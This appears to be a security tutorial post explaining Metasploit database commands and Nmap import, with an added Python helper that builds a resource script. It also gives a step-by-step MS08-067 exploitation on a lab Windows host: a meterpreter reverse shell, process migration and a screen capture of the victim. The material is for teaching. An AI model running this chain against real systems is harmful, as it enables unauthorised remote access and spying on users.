At the end of each #HackOnTuesday episode, we invite everyone to send us their questions and suggestions for the next episodes. Among the comments and e-mails we've received since the last episode, one caught our attention: Dawson, an IT admin from Oregon, asked us if we could briefly explain how to use the db_* commands of Metasploit. So, in this episode, Gianni shows how to use the Metasploit database to store the data collected with Nmap, and how to use that data to populate the RHOSTS variable of Metasploit modules. After that, Gianni moves on and exploits a common vulnerability in one of the Windows boxes on the network.

Tools, Scripts, and Exploits

Steps

  • Connect Metasploit to the PostgreSQL DB
    • db_status
    • db_connect -y /opt/metasploit-framework/database.yml
    • db_status
  • Add a new workspace in Metasploit
    • workspace -h
    • workspace -a hackontuesday
    • workspace
  • Launch Nmap and import results into Metasploit
    • nmap -sT 192.168.75.0/24 -p80,139,445 -oX net.xml
    • db_import /home/kusanagi/net.xml
    • hosts
  • Use Metasploit's db_nmap command to scan the target machine and automatically save the results into the database
    • db_nmap -Pn -sV 192.168.75.138
  • Set the RHOSTS variable of the smb_version module with data from the Metasploit Database
    • search smb
    • use auxiliary/scanner/smb/smb_version
    • show options
    • services
    • services -h
    • services -u
    • services -u -p 445
    • services -u -p 445 -R
    • show options
    • run
  • Use Metasploit's ms08_067_netapi module to get code execution
    • search ms08_067_netapi
    • use exploit/windows/smb/ms08_067_netapi
    • show options
    • set RHOST 192.168.75.138
    • show targets
    • set TARGET 7
    • show payloads
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • show options
    • /sbin/ifconfig
    • set LHOST 192.168.75.146
    • show options
    • exploit
  • Capture the screen of the victim
    • sysinfo
    • ps
    • migrate 1940
    • use espia
    • screengrab
  • Game Over!
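To make the database steps above concrete, here is an added example (not code from the episode or from the Metasploit project) that does offline what `db_import` followed by `services -u -p 445 -R` does inside msfconsole: it parses the Nmap `-oX` XML, keeps only hosts that are up and have the requested port open, and writes out an msfconsole resource script with RHOSTS already set for the smb_version scanner. The Nmap XML embedded below is constructed to look like the output of the episode's `nmap -sT 192.168.75.0/24 -p80,139,445 -oX net.xml` scan (one host with 445 open, one without, one down host); the hosts and paths are the ones shown in the steps, and the function names are this example's own.

```python
"""Mirror Metasploit's `db_import` + `services -u -p 445 -R` on an Nmap XML file.

Added example, not code from the #HackOnTuesday episode or from Metasploit.
It parses the Nmap -oX output that `db_import` would ingest, keeps hosts that
are up and have the target port open (what `services -u -p 445` lists), and
writes an msfconsole resource script that sets RHOSTS the way `-R` does.
"""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sT 192.168.75.0/24 -p80,139,445 -oX net.xml`
# output: two hosts up (only one with 445 open) and one host down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sT 192.168.75.0/24 -p80,139,445 -oX net.xml">
  <host><status state="up"/>
    <address addr="192.168.75.138" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.75.146" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.75.200" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return (host, port, proto, state, name) rows, like the `services` table."""
    rows = []
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # no ports are recorded for hosts that never answered
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name = svc.get("name") if svc is not None else ""
            rows.append((addr, int(port.get("portid")), port.get("protocol"), state, name))
    return rows


def rhosts_for_port(rows, port, proto="tcp"):
    """Unique hosts (scan order) with `port` open: what `services -u -p <port> -R` selects."""
    hosts = []
    for addr, p, pr, state, _name in rows:
        if p == port and pr == proto and state == "open" and addr not in hosts:
            hosts.append(addr)
    return hosts


def resource_script(workspace, xml_path, rhosts, module="auxiliary/scanner/smb/smb_version"):
    """msfconsole .rc file reproducing the episode's DB workflow with RHOSTS prefilled."""
    lines = [
        "db_connect -y /opt/metasploit-framework/database.yml",
        f"workspace -a {workspace}",
        f"db_import {xml_path}",
        f"use {module}",
        f"set RHOSTS {' '.join(rhosts)}",
        "run",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rows = parse_services(SAMPLE_NMAP_XML)
    targets = rhosts_for_port(rows, 445)          # ['192.168.75.138'] for the sample
    print(resource_script("hackontuesday", "/home/kusanagi/net.xml", targets))
```

Save the printed text as, say, `smb.rc` and run `msfconsole -r smb.rc`: the resource script replays the db_connect, workspace, db_import, use and set RHOSTS steps from the list above, so the scanner only touches hosts that actually exposed 445 rather than the whole /24. The `-u` filter matters: a closed or filtered 445 is still a row in the services table, and without `-u` it would land in RHOSTS too.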
